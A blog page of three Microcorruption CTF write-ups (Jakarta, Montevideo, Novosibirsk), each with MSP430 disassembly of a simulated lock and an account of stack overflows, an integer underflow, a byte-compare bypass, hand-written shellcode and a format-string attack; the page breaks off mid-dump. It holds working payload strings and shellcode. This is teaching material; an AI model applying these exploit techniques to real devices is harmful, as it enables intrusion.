jiva

Microcorruption CTF Jakarta Write-up

2018-06-24T15:20:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Jakarta” (LOCKIT PRO r b.06).

From the challenge overview, they indicate that input length checking has been beefed up some more:

OVERVIEW
    - A firmware update further rejects passwords which are too long.
    - This lock is attached the the LockIT Pro HSM-1.

Let’s dissect the code and see what they’re up to.

0010 <__trap_interrupt> 0010: 3041 ret 4400 <__init_stack> 4400: 3140 0044 mov #0x4400, sp 4404 <__low_level_init> 4404: 1542 5c01 mov &0x015c, r5 4408: 75f3 and.b #-0x1, r5 440a: 35d0 085a bis #0x5a08, r5 440e <__do_copy_data> 440e: 3f40 0200 mov #0x2, r15 4412: 0f93 tst r15 4414: 0724 jz #0x4424 <__do_clear_bss+0x0> 4416: 8245 5c01 mov r5, &0x015c 441a: 2f83 decd r15 441c: 9f4f 0a47 0024 mov 0x470a(r15), 0x2400(r15) 4422: f923 jnz #0x4416 <__do_copy_data+0x8> 4424 <__do_clear_bss> 4424: 3f40 0004 mov #0x400, r15 4428: 0f93 tst r15 442a: 0624 jz #0x4438 442c: 8245 5c01 mov r5, &0x015c 4430: 1f83 dec r15 4432: cf43 0224 mov.b #0x0, 0x2402(r15) 4436: fa23 jnz #0x442c <__do_clear_bss+0x8> 4438

4438: 3150 18fc add #0xfc18, sp 443c: b012 6045 call #0x4560 4440: 0f43 clr r15 4442 <__stop_progExec__> 4442: 32d0 f000 bis #0xf0, sr 4446: fd3f jmp #0x4442 <__stop_progExec__+0x0> 4448 <__ctors_end> 4448: 3040 0847 br #0x4708 <_unexpected_> 444c 444c: 3012 7f00 push #0x7f 4450: b012 6446 call #0x4664 4454: 2153 incd sp 4456: 3041 ret 4458 4458: 0412 push r4 445a: 0441 mov sp, r4 445c: 2453 incd r4 445e: 2183 decd sp 4460: c443 fcff mov.b #0x0, -0x4(r4) 4464: 3e40 fcff mov #0xfffc, r14 4468: 0e54 add r4, r14 446a: 0e12 push r14 446c: 0f12 push r15 446e: 3012 7d00 push #0x7d 4472: b012 6446 call #0x4664 4476: 5f44 fcff mov.b -0x4(r4), r15 447a: 8f11 sxt r15 447c: 3152 add #0x8, sp 447e: 3441 pop r4 4480: 3041 ret 4482 .strings: 4482: "Authentication requires a username and password." 44b3: "Your username and password together may be no more than 32 characters." 44fa: "Please enter your username:" 4516: "Please enter your password:" 4532: "Access granted." 4542: "That password is not correct." 4560 4560: 0b12 push r11 4562: 3150 deff add #0xffde, sp 4566: 3f40 8244 mov #0x4482 "Authentication requires a username and password.", r15 456a: b012 c846 call #0x46c8 456e: 3f40 b344 mov #0x44b3 "Your username and password together may be no more than 32 characters.", r15 4572: b012 c846 call #0x46c8 4576: 3f40 fa44 mov #0x44fa "Please enter your username:", r15 457a: b012 c846 call #0x46c8 457e: 3e40 ff00 mov #0xff, r14 4582: 3f40 0224 mov #0x2402, r15 4586: b012 b846 call #0x46b8 458a: 3f40 0224 mov #0x2402, r15 458e: b012 c846 call #0x46c8 4592: 3f40 0124 mov #0x2401, r15 4596: 1f53 inc r15 4598: cf93 0000 tst.b 0x0(r15) 459c: fc23 jnz #0x4596 459e: 0b4f mov r15, r11 45a0: 3b80 0224 sub #0x2402, r11 45a4: 3e40 0224 mov #0x2402, r14 45a8: 0f41 mov sp, r15 45aa: b012 f446 call #0x46f4 45ae: 7b90 2100 cmp.b #0x21, r11 45b2: 0628 jnc #0x45c0 45b4: 1f42 0024 mov &0x2400, r15 45b8: b012 c846 call #0x46c8 45bc: 3040 4244 br #0x4442 <__stop_progExec__> 45c0: 3f40 1645 mov #0x4516 "Please enter your password:", r15 45c4: b012 c846 call #0x46c8 45c8: 3e40 1f00 mov #0x1f, r14 45cc: 0e8b sub r11, r14 45ce: 3ef0 ff01 and #0x1ff, r14 45d2: 3f40 0224 mov #0x2402, r15 45d6: b012 b846 call #0x46b8 45da: 3f40 0224 mov #0x2402, r15 45de: b012 c846 call #0x46c8 45e2: 3e40 0224 mov #0x2402, r14 45e6: 0f41 mov sp, r15 45e8: 0f5b add r11, r15 45ea: b012 f446 call #0x46f4 45ee: 3f40 0124 mov #0x2401, r15 45f2: 1f53 inc r15 45f4: cf93 0000 tst.b 0x0(r15) 45f8: fc23 jnz #0x45f2 45fa: 3f80 0224 sub #0x2402, r15 45fe: 0f5b add r11, r15 4600: 7f90 2100 cmp.b #0x21, r15 4604: 0628 jnc #0x4612 4606: 1f42 0024 mov &0x2400, r15 460a: b012 c846 call #0x46c8 460e: 3040 4244 br #0x4442 <__stop_progExec__> 4612: 0f41 mov sp, r15 4614: b012 5844 call #0x4458 4618: 0f93 tst r15 461a: 0524 jz #0x4626 461c: b012 4c44 call #0x444c 4620: 3f40 3245 mov #0x4532 "Access granted.", r15 4624: 023c jmp #0x462a 4626: 3f40 4245 mov #0x4542 "That password is not correct.", r15 462a: b012 c846 call #0x46c8 462e: 3150 2200 add #0x22, sp 4632: 3b41 pop r11 4634: 3041 ret 4636 <__do_nothing> 4636: 3041 ret 4638: 496e addc.b r14, r9 463a: 7661 addc.b @sp+, r6 463c: 6c69 addc.b @r9, r12 463e: 6420 jnz #0x4708 <_unexpected_+0x0> 4640: 5061 7373 addc.b 0x7373(sp), pc 4644: 776f addc.b @r15+, r7 4646: 7264 addc.b @r4+, sr 4648: 204c br @r12 464a: 656e addc.b @r14, r5 464c: 6774 subc.b @r4, r7 464e: 683a jl #0x4320 <__none__+0x4320> 4650: 2070 subc @pc, pc 4652: 6173 subc.b #0x2, sp 4654: 7377 .word 0x7773 4656: 6f72 subc.b #0x4, r15 4658: 6420 jnz #0x4722 <_unexpected_+0x1a> 465a: 746f addc.b @r15+, r4 465c: 6f20 jnz #0x473c <_unexpected_+0x34> 465e: 6c6f addc.b @r15, r12 4660: 6e67 addc.b @r7, r14 4662: 2e00 .word 0x002e 4664 4664: 1e41 0200 mov 0x2(sp), r14 4668: 0212 push sr 466a: 0f4e mov r14, r15 466c: 8f10 swpb r15 466e: 024f mov r15, sr 4670: 32d0 0080 bis #0x8000, sr 4674: b012 1000 call #0x10 4678: 3241 pop sr 467a: 3041 ret 467c 467c: 2183 decd sp 467e: 0f12 push r15 4680: 0312 push #0x0 4682: 814f 0400 mov r15, 0x4(sp) 4686: b012 6446 call #0x4664 468a: 1f41 0400 mov 0x4(sp), r15 468e: 3150 0600 add #0x6, sp 4692: 3041 ret 4694 4694: 0412 push r4 4696: 0441 mov sp, r4 4698: 2453 incd r4 469a: 2183 decd sp 469c: 3f40 fcff mov #0xfffc, r15 46a0: 0f54 add r4, r15 46a2: 0f12 push r15 46a4: 1312 push #0x1 46a6: b012 6446 call #0x4664 46aa: 5f44 fcff mov.b -0x4(r4), r15 46ae: 8f11 sxt r15 46b0: 3150 0600 add #0x6, sp 46b4: 3441 pop r4 46b6: 3041 ret 46b8 46b8: 0e12 push r14 46ba: 0f12 push r15 46bc: 2312 push #0x2 46be: b012 6446 call #0x4664 46c2: 3150 0600 add #0x6, sp 46c6: 3041 ret 46c8 46c8: 0b12 push r11 46ca: 0b4f mov r15, r11 46cc: 073c jmp #0x46dc 46ce: 1b53 inc r11 46d0: 8f11 sxt r15 46d2: 0f12 push r15 46d4: 0312 push #0x0 46d6: b012 6446 call #0x4664 46da: 2152 add #0x4, sp 46dc: 6f4b mov.b @r11, r15 46de: 4f93 tst.b r15 46e0: f623 jnz #0x46ce 46e2: 3012 0a00 push #0xa 46e6: 0312 push #0x0 46e8: b012 6446 call #0x4664 46ec: 2152 add #0x4, sp 46ee: 0f43 clr r15 46f0: 3b41 pop r11 46f2: 3041 ret 46f4 46f4: 0d4f mov r15, r13 46f6: 023c jmp #0x46fc 46f8: 1e53 inc r14 46fa: 1d53 inc r13 46fc: 6c4e mov.b @r14, r12 46fe: cd4c 0000 mov.b r12, 0x0(r13) 4702: 4c93 tst.b r12 4704: f923 jnz #0x46f8 4706: 3041 ret 4708 <_unexpected_> 4708: 0013 reti pc

In the main() function we see a similar call to login(). However in this program, we’re presented with a message indicating that we need to provide a username and password. Additionally, they indicate that a length restriction is in place:

Authentication requires a username and password.
Your username and password together may be no more than 32 characters.

Further down, we see multiple call to puts(), two calls to strcpy() and then some code that surrounds a call to unlock_door().

Let’s run the program and see how the stack looks like after the first strcpy()…

We’ll start off by entering AAAAAAAAAA as the username and setting breakpoints before and after the first strcpy(). We see that the username is copied to the stack starting at address 3ff2. Also note, there appears to be a return address not too far away from our input on the stack, located at address 4016 and containing 4440. This is the return address from the call to login() from main(). Also pay attention to the instructions starting at address 45c8 - we’ll discuss this in a bit.

Before we move on to the second strcpy(), let’s see what happens when we try to overflow the return address with a long username…

The offset to the return address is 36-bytes. We input AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABB and watch as the return address is replaced with 4242. However, the program errors out because we failed the cmp.b #0x21, r11 check. Bummer, I guess we have to keep trying :frowning:.

Notice from the first video what was happening at 45c8, where we passed the first length check and stepped through the following code:

45c8:  3e40 1f00      mov   #0x1f, r14
45cc:  0e8b           sub   r11, r14
45ce:  3ef0 ff01      and   #0x1ff, r14
45d2:  3f40 0224      mov   #0x2402, r15
45d6:  b012 b846      call  #0x46b8 

The program loads the value 0x1f into r14 then subtracts r11 (the length of the username) from it, which effectively gives us the allowed length of the password. Once getsn() is called, r14 and r15 is pushed on to the stack, and then we’re prompted to enter in a password. It’s not clear from the code, but r14 appears to contain an upper limit of the number of bytes that can be read in from getsn() into the input buffer (which is located at 2402 and pointed to by r15).

This means that we’ll be unable to read in more than 0x1f-len(username) number of bytes… Or does it? Let’s see what happens when we input 32-bytes:

Because of an integer-underflow vulnerability, we’re able to increase the password buffer read-limit from 0x1f-len(username) to 511 bytes (0x01ff), all while staying within the length check (cmp.b #0x21, r11) - sweet!

Now that we’re able to get more than 32 bytes onto the stack, let’s try to overflow the return address (located at 4016) with a 6-byte password…

Although we’re able to successfully overwrite the return address, the program calls __stop_progExec__ before returning. :pouting_cat:

Stepping through the code, we can see that there’s an additional length check occurring at 45ee:

45ee:  3f40 0124      mov   #0x2401, r15
45f2:  1f53           inc   r15
45f4:  cf93 0000      tst.b 0x0(r15)
45f8:  fc23           jnz   #0x45f2 
45fa:  3f80 0224      sub   #0x2402, r15
45fe:  0f5b           add   r11, r15
4600:  7f90 2100      cmp.b #0x21, r15

After our password is copied onto the stack, the code iterates over the password that’s in the input buffer (which is not on the stack), and calculates the combined length of the username and password which will be stored in r15. Then, if the calculated length is greater than 0x21, the program exits without returning. However, pay close attention to the comparison instruction being used: cmp.b

According to the MSP430 manual:

All single-operand and dual-operand instructions can be byte or word
instructions by using .B or .W extensions. Byte instructions are used to access
byte data or byte peripherals. Word instructions are used to access word data
or word peripherals. If no extension is used, the instruction is a word
instruction.

The .b means that the comparison is performed on the lower byte of r15! What if we were able to roll the length past 0xff? Remember that we were able to find a bug that increased the password read length to 511. I think we’re on to something :smirk_cat: …

We’re able to control PC! By using a 224-byte password (with the 5th and 6th byte overwriting the return address), we’ll roll the final value in r15 when it gets added to r11 (i.e. 0x20 + 224 == 256 == 0x100), and when the cmp.b instruction is performed, we’ll effectively bypass the length comparison. Then instead of exiting out of the program, the code finishes until it returns. Let’s try jumping execution to unlock_door() instead of 4141…

Aw yeah :boom:

Username: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Password:
BBBBLDBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

Note that `LD` translates to `4c44` which in
little-endian is `444c` which is the location of `unlock_door`

Microcorruption CTF Montevideo Write-up

2018-06-20T20:30:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Montevideo” (LOCKIT PRO r c.03).

In the manual, they claim to have increased their security practices:

OVERVIEW
    - Lockitall developers  have rewritten the code  to conform to the
      internal secure development process.
    - This lock is attached the the LockIT Pro HSM-2.

We’ll see about that :wink:. Let’s take a look at the code.

0010 <__trap_interrupt> 0010: 3041 ret 4400 <__init_stack> 4400: 3140 0044 mov #0x4400, sp 4404 <__low_level_init> 4404: 1542 5c01 mov &0x015c, r5 4408: 75f3 and.b #-0x1, r5 440a: 35d0 085a bis #0x5a08, r5 440e <__do_copy_data> 440e: 3f40 0000 clr r15 4412: 0f93 tst r15 4414: 0724 jz #0x4424 <__do_clear_bss+0x0> 4416: 8245 5c01 mov r5, &0x015c 441a: 2f83 decd r15 441c: 9f4f 5846 0024 mov 0x4658(r15), 0x2400(r15) 4422: f923 jnz #0x4416 <__do_copy_data+0x8> 4424 <__do_clear_bss> 4424: 3f40 6400 mov #0x64, r15 4428: 0f93 tst r15 442a: 0624 jz #0x4438 442c: 8245 5c01 mov r5, &0x015c 4430: 1f83 dec r15 4432: cf43 0024 mov.b #0x0, 0x2400(r15) 4436: fa23 jnz #0x442c <__do_clear_bss+0x8> 4438

4438: b012 f444 call #0x44f4 443c <__stop_progExec__> 443c: 32d0 f000 bis #0xf0, sr 4440: fd3f jmp #0x443c <__stop_progExec__+0x0> 4442 <__ctors_end> 4442: 3040 5646 br #0x4656 <_unexpected_> 4446 4446: 0412 push r4 4448: 0441 mov sp, r4 444a: 2453 incd r4 444c: 2183 decd sp 444e: c443 fcff mov.b #0x0, -0x4(r4) 4452: 3e40 fcff mov #0xfffc, r14 4456: 0e54 add r4, r14 4458: 0e12 push r14 445a: 0f12 push r15 445c: 3012 7e00 push #0x7e 4460: b012 4c45 call #0x454c 4464: 5f44 fcff mov.b -0x4(r4), r15 4468: 8f11 sxt r15 446a: 3152 add #0x8, sp 446c: 3441 pop r4 446e: 3041 ret 4470 .strings: 4470: "Enter the password to continue." 4490: "Remember: passwords are between 8 and 16 characters." 44c5: "Access granted." 44d5: "That password is not correct." 44f3: "" 44f4 44f4: 3150 f0ff add #0xfff0, sp 44f8: 3f40 7044 mov #0x4470 "Enter the password to continue.", r15 44fc: b012 b045 call #0x45b0 4500: 3f40 9044 mov #0x4490 "Remember: passwords are between 8 and 16 characters.", r15 4504: b012 b045 call #0x45b0 4508: 3e40 3000 mov #0x30, r14 450c: 3f40 0024 mov #0x2400, r15 4510: b012 a045 call #0x45a0 4514: 3e40 0024 mov #0x2400, r14 4518: 0f41 mov sp, r15 451a: b012 dc45 call #0x45dc 451e: 3d40 6400 mov #0x64, r13 4522: 0e43 clr r14 4524: 3f40 0024 mov #0x2400, r15 4528: b012 f045 call #0x45f0 452c: 0f41 mov sp, r15 452e: b012 4644 call #0x4446 4532: 0f93 tst r15 4534: 0324 jz #0x453c 4536: 3f40 c544 mov #0x44c5 "Access granted.", r15 453a: 023c jmp #0x4540 453c: 3f40 d544 mov #0x44d5 "That password is not correct.", r15 4540: b012 b045 call #0x45b0 4544: 3150 1000 add #0x10, sp 4548: 3041 ret 454a <__do_nothing> 454a: 3041 ret 454c 454c: 1e41 0200 mov 0x2(sp), r14 4550: 0212 push sr 4552: 0f4e mov r14, r15 4554: 8f10 swpb r15 4556: 024f mov r15, sr 4558: 32d0 0080 bis #0x8000, sr 455c: b012 1000 call #0x10 4560: 3241 pop sr 4562: 3041 ret 4564 4564: 2183 decd sp 4566: 0f12 push r15 4568: 0312 push #0x0 456a: 814f 0400 mov r15, 0x4(sp) 456e: b012 4c45 call #0x454c 4572: 1f41 0400 mov 0x4(sp), r15 4576: 3150 0600 add #0x6, sp 457a: 3041 ret 457c 457c: 0412 push r4 457e: 0441 mov sp, r4 4580: 2453 incd r4 4582: 2183 decd sp 4584: 3f40 fcff mov #0xfffc, r15 4588: 0f54 add r4, r15 458a: 0f12 push r15 458c: 1312 push #0x1 458e: b012 4c45 call #0x454c 4592: 5f44 fcff mov.b -0x4(r4), r15 4596: 8f11 sxt r15 4598: 3150 0600 add #0x6, sp 459c: 3441 pop r4 459e: 3041 ret 45a0 45a0: 0e12 push r14 45a2: 0f12 push r15 45a4: 2312 push #0x2 45a6: b012 4c45 call #0x454c 45aa: 3150 0600 add #0x6, sp 45ae: 3041 ret 45b0 45b0: 0b12 push r11 45b2: 0b4f mov r15, r11 45b4: 073c jmp #0x45c4 45b6: 1b53 inc r11 45b8: 8f11 sxt r15 45ba: 0f12 push r15 45bc: 0312 push #0x0 45be: b012 4c45 call #0x454c 45c2: 2152 add #0x4, sp 45c4: 6f4b mov.b @r11, r15 45c6: 4f93 tst.b r15 45c8: f623 jnz #0x45b6 45ca: 3012 0a00 push #0xa 45ce: 0312 push #0x0 45d0: b012 4c45 call #0x454c 45d4: 2152 add #0x4, sp 45d6: 0f43 clr r15 45d8: 3b41 pop r11 45da: 3041 ret 45dc 45dc: 0d4f mov r15, r13 45de: 023c jmp #0x45e4 45e0: 1e53 inc r14 45e2: 1d53 inc r13 45e4: 6c4e mov.b @r14, r12 45e6: cd4c 0000 mov.b r12, 0x0(r13) 45ea: 4c93 tst.b r12 45ec: f923 jnz #0x45e0 45ee: 3041 ret 45f0 45f0: 0b12 push r11 45f2: 0a12 push r10 45f4: 0912 push r9 45f6: 0812 push r8 45f8: 0b4f mov r15, r11 45fa: 3d90 0600 cmp #0x6, r13 45fe: 082c jc #0x4610 4600: 043c jmp #0x460a 4602: cb4e 0000 mov.b r14, 0x0(r11) 4606: 1b53 inc r11 4608: 3d53 add #-0x1, r13 460a: 0d93 tst r13 460c: fa23 jnz #0x4602 460e: 1e3c jmp #0x464c 4610: 4a4e mov.b r14, r10 4612: 0a93 tst r10 4614: 0324 jz #0x461c 4616: 0c4a mov r10, r12 4618: 8c10 swpb r12 461a: 0adc bis r12, r10 461c: 1fb3 bit #0x1, r15 461e: 0524 jz #0x462a 4620: 3d53 add #-0x1, r13 4622: cf4e 0000 mov.b r14, 0x0(r15) 4626: 0b4f mov r15, r11 4628: 1b53 inc r11 462a: 0c4d mov r13, r12 462c: 12c3 clrc 462e: 0c10 rrc r12 4630: 084b mov r11, r8 4632: 094c mov r12, r9 4634: 884a 0000 mov r10, 0x0(r8) 4638: 2853 incd r8 463a: 3953 add #-0x1, r9 463c: fb23 jnz #0x4634 463e: 0c5c add r12, r12 4640: 0c5b add r11, r12 4642: 1df3 and #0x1, r13 4644: 0d99 cmp r9, r13 4646: 0224 jeq #0x464c 4648: cc4e 0000 mov.b r14, 0x0(r12) 464c: 3841 pop r8 464e: 3941 pop r9 4650: 3a41 pop r10 4652: 3b41 pop r11 4654: 3041 ret 4656 <_unexpected_> 4656: 0013 reti pc

Looking at the main() function, we can see that a single function named login() is called. Inside of login(), we see that after a password prompt, a call to strcpy() is made. The password prompt itself, “Remember: passwords are between 8 and 16 characters.”, implies that there’s some sort of length checking in place. Let’s play around in the debugger and see if this is actually the case.

After setting breakpoints before and after the call to strcpy(), we run the program and enter AAAAAAAAAA as the input. We keep an eye the address pointed to by the stackpointer (sp == 43ee) and watch the function place our input onto the stack.

Pay close attention to the bytes soon after our input ends: 3c44. If you stepped through the program from the beginning, you’ll notice that this value on the stack is actually the return address (443c) that was pushed as a result of the call to login() from main() originally! Let’s try overwriting these bytes (which are at offset 17 and 18), and see if we can control the program counter…

We try the input BBBBBBBBBBBBBBBBAA and watch the memory address containing the return address get overwritten. After continuing execution past the second breakpoint, we see the program crash and pc contain 4141! :feelsgood:

Now that we’ve confirmed a stack buffer overflow vulnerability exists, we need to find a way exploit it. In classical buffer overflow exploit examples, the payload (usually shellcode) is stuffed at the beginning of the buffer that we’re overflowing. Then, the return address is overwritten so that it points back to the start of our buffer. When the executing function returns, the address of the buffer is popped into the program counter and our payload gets executed. If we were to try something similar here, that means we’d have to stuff our payload into 16 bytes (because the 17th and 18th byte map to the return address on the stack). That’s not that much room :thinking:. Oh and don’t forget, if the payload includes any null bytes, strcpy() won’t copy the entire input to the stack :worried:.

Since this program contains the familiar conditional_unlock_door() function which pushes (a useless) 0x7e to the stack before calling the interrupt, I decided to write shellcode that will overwrite the 0x7e with 0x7f (the code to unlock the door).

After some careful trial and error with the assembler, I meticulously wrote the following code:

mov   #0x7f01, r12    # load 0x7f01 into r12
add   #-0x1, r12      # subtract 0x01 from r12 (resulting in 0x7f00)
swpb  r12             # swap the two bytes (resulting in 0x007f)
mov   r12, 0x445e(r6) # write 0x007f into 0x445e
call  #0x4446         # call to conditional_unlock_door()

My shellcode will essentially put the value of 0x7f into register r12 (by performing some byte manipulations in order to avoid null-bytes in my payload), and will then replace the 0x7e in conditional_unlock_door() with 0x7f. After the overwrite happens, a call to conditional_unlock_door() is made…

Great Success! :boom:

3c40017f3c538c10864c5e44b0124644ee43

Note that the shellcode is exactly 16 bytes :sweat_smile:

Microcorruption CTF Novosibirsk Write-up

2018-02-10T18:04:00+00:00

Summary:

This is a write-up of my solution to the Microcorruption CTF challenge “Novosibirsk” (LOCKIT PRO r c.02).

In this challenge, we’re giving a hint right from the start:

OVERVIEW
    - This lock is attached the the LockIT Pro HSM-2.
    - We have added features from b.03 to the new hardware.

If you recall from the b.03 challenge (Addis Ababa), we had to exploit a printf() vulnerability using %n to write to an arbitrary memory location.

Let’s see if we need to do something similar in this challenge…

0010 <__trap_interrupt> 0010: 3041 ret 4400 <__init_stack> 4400: 3140 0044 mov #0x4400, sp 4404 <__low_level_init> 4404: 1542 5c01 mov &0x015c, r5 4408: 75f3 and.b #-0x1, r5 440a: 35d0 085a bis #0x5a08, r5 440e <__do_copy_data> 440e: 3f40 0000 clr r15 4412: 0f93 tst r15 4414: 0724 jz #0x4424 <__do_clear_bss+0x0> 4416: 8245 5c01 mov r5, &0x015c 441a: 2f83 decd r15 441c: 9f4f f246 0024 mov 0x46f2(r15), 0x2400(r15) 4422: f923 jnz #0x4416 <__do_copy_data+0x8> 4424 <__do_clear_bss> 4424: 3f40 f401 mov #0x1f4, r15 4428: 0f93 tst r15 442a: 0624 jz #0x4438 442c: 8245 5c01 mov r5, &0x015c 4430: 1f83 dec r15 4432: cf43 0024 mov.b #0x0, 0x2400(r15) 4436: fa23 jnz #0x442c <__do_clear_bss+0x8> 4438

4438: 0441 mov sp, r4 443a: 2453 incd r4 443c: 3150 0cfe add #0xfe0c, sp 4440: 3012 da44 push #0x44da "Enter your username below to authenticate.\n" 4444: b012 c645 call #0x45c6 4448: b140 0645 0000 mov #0x4506 ">> ", 0x0(sp) 444e: b012 c645 call #0x45c6 4452: 2153 incd sp 4454: 3e40 f401 mov #0x1f4, r14 4458: 3f40 0024 mov #0x2400, r15 445c: b012 8a45 call #0x458a 4460: 3e40 0024 mov #0x2400, r14 4464: 0f44 mov r4, r15 4466: 3f50 0afe add #0xfe0a, r15 446a: b012 dc46 call #0x46dc 446e: 3f40 0afe mov #0xfe0a, r15 4472: 0f54 add r4, r15 4474: 0f12 push r15 4476: b012 c645 call #0x45c6 447a: 2153 incd sp 447c: 3f40 0a00 mov #0xa, r15 4480: b012 4e45 call #0x454e 4484: 0f44 mov r4, r15 4486: 3f50 0afe add #0xfe0a, r15 448a: b012 b044 call #0x44b0 448e: 0f93 tst r15 4490: 0324 jz #0x4498 4492: 3012 0a45 push #0x450a "Access Granted!" 4496: 023c jmp #0x449c 4498: 3012 1a45 push #0x451a "That username is not valid." 449c: b012 c645 call #0x45c6 44a0: 0f43 clr r15 44a2: 3150 f601 add #0x1f6, sp 44a6 <__stop_progExec__> 44a6: 32d0 f000 bis #0xf0, sr 44aa: fd3f jmp #0x44a6 <__stop_progExec__+0x0> 44ac <__ctors_end> 44ac: 3040 f046 br #0x46f0 <_unexpected_> 44b0 44b0: 0412 push r4 44b2: 0441 mov sp, r4 44b4: 2453 incd r4 44b6: 2183 decd sp 44b8: c443 fcff mov.b #0x0, -0x4(r4) 44bc: 3e40 fcff mov #0xfffc, r14 44c0: 0e54 add r4, r14 44c2: 0e12 push r14 44c4: 0f12 push r15 44c6: 3012 7e00 push #0x7e 44ca: b012 3645 call #0x4536 44ce: 5f44 fcff mov.b -0x4(r4), r15 44d2: 8f11 sxt r15 44d4: 3152 add #0x8, sp 44d6: 3441 pop r4 44d8: 3041 ret 44da .strings: 44da: "Enter your username below to authenticate.\n" 4506: ">> " 450a: "Access Granted!" 451a: "That username is not valid." 4536 4536: 1e41 0200 mov 0x2(sp), r14 453a: 0212 push sr 453c: 0f4e mov r14, r15 453e: 8f10 swpb r15 4540: 024f mov r15, sr 4542: 32d0 0080 bis #0x8000, sr 4546: b012 1000 call #0x10 454a: 3241 pop sr 454c: 3041 ret 454e 454e: 2183 decd sp 4550: 0f12 push r15 4552: 0312 push #0x0 4554: 814f 0400 mov r15, 0x4(sp) 4558: b012 3645 call #0x4536 455c: 1f41 0400 mov 0x4(sp), r15 4560: 3150 0600 add #0x6, sp 4564: 3041 ret 4566 4566: 0412 push r4 4568: 0441 mov sp, r4 456a: 2453 incd r4 456c: 2183 decd sp 456e: 3f40 fcff mov #0xfffc, r15 4572: 0f54 add r4, r15 4574: 0f12 push r15 4576: 1312 push #0x1 4578: b012 3645 call #0x4536 457c: 5f44 fcff mov.b -0x4(r4), r15 4580: 8f11 sxt r15 4582: 3150 0600 add #0x6, sp 4586: 3441 pop r4 4588: 3041 ret 458a 458a: 0e12 push r14 458c: 0f12 push r15 458e: 2312 push #0x2 4590: b012 3645 call #0x4536 4594: 3150 0600 add #0x6, sp 4598: 3041 ret 459a 459a: 0b12 push r11 459c: 0b4f mov r15, r11 459e: 073c jmp #0x45ae 45a0: 1b53 inc r11 45a2: 8f11 sxt r15 45a4: 0f12 push r15 45a6: 0312 push #0x0 45a8: b012 3645 call #0x4536 45ac: 2152 add #0x4, sp 45ae: 6f4b mov.b @r11, r15 45b0: 4f93 tst.b r15 45b2: f623 jnz #0x45a0 45b4: 3012 0a00 push #0xa 45b8: 0312 push #0x0 45ba: b012 3645 call #0x4536 45be: 2152 add #0x4, sp 45c0: 0f43 clr r15 45c2: 3b41 pop r11 45c4: 3041 ret 45c6 45c6: 0b12 push r11 45c8: 0a12 push r10 45ca: 0912 push r9 45cc: 0812 push r8 45ce: 0712 push r7 45d0: 0412 push r4 45d2: 0441 mov sp, r4 45d4: 3450 0c00 add #0xc, r4 45d8: 2183 decd sp 45da: 1b44 0200 mov 0x2(r4), r11 45de: 8441 f2ff mov sp, -0xe(r4) 45e2: 0f4b mov r11, r15 45e4: 0e43 clr r14 45e6: 0b3c jmp #0x45fe 45e8: 1f53 inc r15 45ea: 7d90 2500 cmp.b #0x25, r13 45ee: 0720 jne #0x45fe 45f0: 6d9f cmp.b @r15, r13 45f2: 0320 jne #0x45fa 45f4: 1f53 inc r15 45f6: 0d43 clr r13 45f8: 013c jmp #0x45fc 45fa: 1d43 mov #0x1, r13 45fc: 0e5d add r13, r14 45fe: 6d4f mov.b @r15, r13 4600: 4d93 tst.b r13 4602: f223 jnz #0x45e8 4604: 0f4e mov r14, r15 4606: 0f5f add r15, r15 4608: 2f53 incd r15 460a: 018f sub r15, sp 460c: 0941 mov sp, r9 460e: 0c44 mov r4, r12 4610: 2c52 add #0x4, r12 4612: 0f41 mov sp, r15 4614: 0d43 clr r13 4616: 053c jmp #0x4622 4618: af4c 0000 mov @r12, 0x0(r15) 461c: 1d53 inc r13 461e: 2f53 incd r15 4620: 2c53 incd r12 4622: 0d9e cmp r14, r13 4624: f93b jl #0x4618 4626: 0a43 clr r10 4628: 3740 0900 mov #0x9, r7 462c: 4a3c jmp #0x46c2 462e: 084b mov r11, r8 4630: 1853 inc r8 4632: 7f90 2500 cmp.b #0x25, r15 4636: 0624 jeq #0x4644 4638: 1a53 inc r10 463a: 0b48 mov r8, r11 463c: 8f11 sxt r15 463e: b012 4e45 call #0x454e 4642: 3f3c jmp #0x46c2 4644: 6e48 mov.b @r8, r14 4646: 4e9f cmp.b r15, r14 4648: 0620 jne #0x4656 464a: 1a53 inc r10 464c: 3f40 2500 mov #0x25, r15 4650: b012 4e45 call #0x454e 4654: 333c jmp #0x46bc 4656: 7e90 7300 cmp.b #0x73, r14 465a: 0b20 jne #0x4672 465c: 2b49 mov @r9, r11 465e: 053c jmp #0x466a 4660: 1a53 inc r10 4662: 1b53 inc r11 4664: 8f11 sxt r15 4666: b012 4e45 call #0x454e 466a: 6f4b mov.b @r11, r15 466c: 4f93 tst.b r15 466e: f823 jnz #0x4660 4670: 253c jmp #0x46bc 4672: 7e90 7800 cmp.b #0x78, r14 4676: 1c20 jne #0x46b0 4678: 2b49 mov @r9, r11 467a: 173c jmp #0x46aa 467c: 0f4b mov r11, r15 467e: 8f10 swpb r15 4680: 3ff0 ff00 and #0xff, r15 4684: 12c3 clrc 4686: 0f10 rrc r15 4688: 0f11 rra r15 468a: 0f11 rra r15 468c: 0f11 rra r15 468e: 1a53 inc r10 4690: 079f cmp r15, r7 4692: 0338 jl #0x469a 4694: 3f50 3000 add #0x30, r15 4698: 023c jmp #0x469e 469a: 3f50 5700 add #0x57, r15 469e: b012 4e45 call #0x454e 46a2: 0b5b add r11, r11 46a4: 0b5b add r11, r11 46a6: 0b5b add r11, r11 46a8: 0b5b add r11, r11 46aa: 0b93 tst r11 46ac: e723 jnz #0x467c 46ae: 063c jmp #0x46bc 46b0: 7e90 6e00 cmp.b #0x6e, r14 46b4: 0320 jne #0x46bc 46b6: 2f49 mov @r9, r15 46b8: 8f4a 0000 mov r10, 0x0(r15) 46bc: 2953 incd r9 46be: 0b48 mov r8, r11 46c0: 1b53 inc r11 46c2: 6f4b mov.b @r11, r15 46c4: 4f93 tst.b r15 46c6: b323 jnz #0x462e 46c8: 1144 f2ff mov -0xe(r4), sp 46cc: 2153 incd sp 46ce: 3441 pop r4 46d0: 3741 pop 